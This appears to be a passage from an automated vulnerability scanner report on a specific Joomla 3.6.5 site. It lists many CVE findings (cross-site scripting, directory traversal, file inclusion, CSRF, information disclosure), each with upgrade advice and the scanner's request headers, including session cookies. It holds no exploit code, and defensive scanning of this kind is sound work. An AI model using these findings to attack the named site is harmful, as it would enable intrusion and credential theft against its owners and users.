Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.19)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.19 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.20 or latest

References

https://developer.joomla.org/security-centre/822-20200705-core-escape-mod-random-image-link.html
(https://developer.joomla.org/security-centre/822-20200705-core-escape-mod-random-image-link.html)

CVE-2020-15696 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15696)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.19 are affected.


Request headers

100
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.25)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.25 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.26 or latest

References

https://developer.joomla.org/security-centre/850-20210401-core-escape-xss-in-logo-parameter-error-pages.html
(https://developer.joomla.org/security-centre/850-20210401-core-escape-xss-in-logo-parameter-error-pages.html)

CVE-2021-26030 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26030)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.25 are affected.


Request headers

101
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.26)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.26 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.27 or latest

References

https://developer.joomla.org/security-centre/852-20210501-core-adding-html-to-the-executable-block-list-of-mediahelper-
canupload.html (https://developer.joomla.org/security-centre/852-20210501-core-adding-html-to-the-executable-block-list-
of-mediahelper-canupload.html)

CVE-2021-26032 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26032)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.26 are affected.


Request headers

102
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.27)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.27 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.28 or latest

References

https://developer.joomla.org/security-centre/860-20210705-core-xss-in-com-media-imagelist.html
(https://developer.joomla.org/security-centre/860-20210705-core-xss-in-com-media-imagelist.html)

CVE-2021-26039 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26039)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.27 are affected.


Request headers

103
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.27)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.27 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.28 or latest

References

https://developer.joomla.org/security-centre/856-20210701-core-xss-in-jform-rules-field.html
(https://developer.joomla.org/security-centre/856-20210701-core-xss-in-jform-rules-field.html)

CVE-2021-26035 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26035)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.27 are affected.


Request headers

104
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.1.0 - 3.9.23)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.1.0 and up to and including 3.9.23 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.24 or latest

References

https://developer.joomla.org/security-centre/838-20210103-core-xss-in-com-tags-image-parameters.html
(https://developer.joomla.org/security-centre/838-20210103-core-xss-in-com-tags-image-parameters.html)

CVE-2021-23125 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23125)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.1.0 and 3.9.23 are affected.


Request headers

105
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.1.2 - 3.8.7)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.1.2 and up to and including 3.8.7 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.8 or latest

References

https://developer.joomla.org/security-centre/736-20180508-core-possible-xss-attack-in-the-redirect-method.html
(https://developer.joomla.org/security-centre/736-20180508-core-possible-xss-attack-in-the-redirect-method.html)

CVE-2018-11328 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11328)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.1.2 and 3.8.7 are affected.


Request headers

106
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.2.0 - 3.9.3)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including 3.9.3 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.4 or latest

References

https://developer.joomla.org/security-centre/772-20190301-core-xss-in-com-config-json-handler.html
(https://developer.joomla.org/security-centre/772-20190301-core-xss-in-com-config-json-handler.html)

CVE-2019-9712 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9712)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.9.3 are affected.


Request headers

107
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.6.0 - 3.9.6)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.6.0 and up to and including 3.9.6 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.7 or latest

References

https://developer.joomla.org/security-centre/784-20190602-core-xss-in-subform-field (https://developer.joomla.org/security-
centre/784-20190602-core-xss-in-subform-field)

CVE-2019-12766 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12766)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.6.0 and 3.9.6 are affected.


Request headers

108
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Directory Traversal (3.0.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions 3.x.x ranging from 3.0.0 and up to and including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://github.com/HoangKien1020/CVE-2021-23132 (https://github.com/HoangKien1020/CVE-2021-23132)

https://developer.joomla.org/security-centre/846-20210306-core-com-media-allowed-paths-that-are-not-intended-for-image-
uploads.html (https://developer.joomla.org/security-centre/846-20210306-core-com-media-allowed-paths-that-are-not-
intended-for-image-uploads.html)

CVE-2021-23132 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23132)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.24 are affected.


Request headers

109
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Directory Traversal (3.0.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions 3.x.x ranging from 3.0.0 and up to and including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://developer.joomla.org/security-centre/848-20210308-core-path-traversal-within-joomla-archive-zip-class.html
(https://developer.joomla.org/security-centre/848-20210308-core-path-traversal-within-joomla-archive-zip-class.html)

CVE-2021-26028 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26028)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.24 are affected.


Request headers

110
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Information Disclosure (3.0.0 - 3.8.7)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.8.7 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.8 or latest

References

https://developer.joomla.org/security-centre/732-20180504-core-installer-leaks-plain-text-password-to-local-user.html
(https://developer.joomla.org/security-centre/732-20180504-core-installer-leaks-plain-text-password-to-local-user.html)

CVE-2018-11325 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11325)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.8.7 are affected.


Request headers

111
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Information Disclosure (3.0.0 - 3.9.19)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and
including 3.9.19 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.20 or latest

References

https://developer.joomla.org/security-centre/823-20200706-core-system-information-screen-could-expose-redis-or-proxy-
credentials.html (https://developer.joomla.org/security-centre/823-20200706-core-system-information-screen-could-expose-
redis-or-proxy-credentials.html)

CVE-2020-15698 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15698)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.19 are affected.


Request headers

112
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Information Disclosure (3.1.0 - 3.8.7)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.1.0 and up to and
including 3.8.7 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.8 or latest

References

https://developer.joomla.org/security-centre/731-20180503-core-information-disclosure-about-unpublished-tags.html
(https://developer.joomla.org/security-centre/731-20180503-core-information-disclosure-about-unpublished-tags.html)

CVE-2018-11327 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11327)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.1.0 and 3.8.7 are affected.


Request headers

113
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Information Disclosure (3.4.0 - 3.6.5)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.4.0 and up to and
including 3.6.5 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.7.0 or latest

References

https://developer.joomla.org/security-centre/690-core-information-disclosure.html (https://developer.joomla.org/security-
centre/690-core-information-disclosure.html)

CVE-2017-8057 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8057)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.4.0 and 3.6.5 are affected.


Request headers

114
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Information Disclosure (3.6.0 - 3.9.12)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions 3.x.x ranging from 3.6.0 and up to and
including 3.9.12 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.13 or latest

References

https://developer.joomla.org/security-centre/795-20191002-core-path-disclosure-in-phpuft8-mapping-files.html
(https://developer.joomla.org/security-centre/795-20191002-core-path-disclosure-in-phpuft8-mapping-files.html)

CVE-2019-18674 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18674)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.6.0 and 3.9.12 are affected.


Request headers

115
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Local File Inclusion (3.0.0 - 3.9.25)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions 3.x.x ranging from 3.0.0 and up to and including 3.9.25 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.26 or latest

References

https://developer.joomla.org/security-centre/851-20210402-core-inadequate-filters-on-module-layout-settings.html
(https://developer.joomla.org/security-centre/851-20210402-core-inadequate-filters-on-module-layout-settings.html)

CVE-2021-26031 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26031)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.25 are affected.


Request headers

116
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Multiple Cross-Site Request Forgery Vulnerabilities (3.0.0 - 3.9.14)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple cross-site request forgery vulnerabilities. Exploiting these issues may allow a remote
attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks
are also possible. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.14 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.15 or latest

References

https://developer.joomla.org/security-centre/798-20200101-core-csrf-in-batch-actions.html
(https://developer.joomla.org/security-centre/798-20200101-core-csrf-in-batch-actions.html)

https://developer.joomla.org/security-centre/799-20200102-core-csrf-com-templates-less-compiler.html
(https://developer.joomla.org/security-centre/799-20200102-core-csrf-com-templates-less-compiler.html)

CVE-2020-8419 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8419)

CVE-2020-8420 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8420)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.14 are affected.


Request headers

117
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Multiple Cross-Site Request Forgery Vulnerabilities (3.2.0 - 3.9.15)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple cross-site request forgery vulnerabilities. Exploiting these issues may allow a remote
attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks
are also possible. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including 3.9.15 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.16 or latest

References

https://developer.joomla.org/security-centre/802-20200301-core-csrf-in-com-templates-image-actions.html
(https://developer.joomla.org/security-centre/802-20200301-core-csrf-in-com-templates-image-actions.html)

CVE-2020-10241 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10241)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.9.15 are affected.


Request headers

118
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Multiple Cross-Site Scripting Vulnerabilities (3.0.0 - 3.8.7)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the
context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other
attacks. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.8.7 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.8 or latest

References

https://developer.joomla.org/security-centre/733-20180505-core-xss-vulnerabilities-additional-hardening.html
(https://developer.joomla.org/security-centre/733-20180505-core-xss-vulnerabilities-additional-hardening.html)

CVE-2018-11326 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11326)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

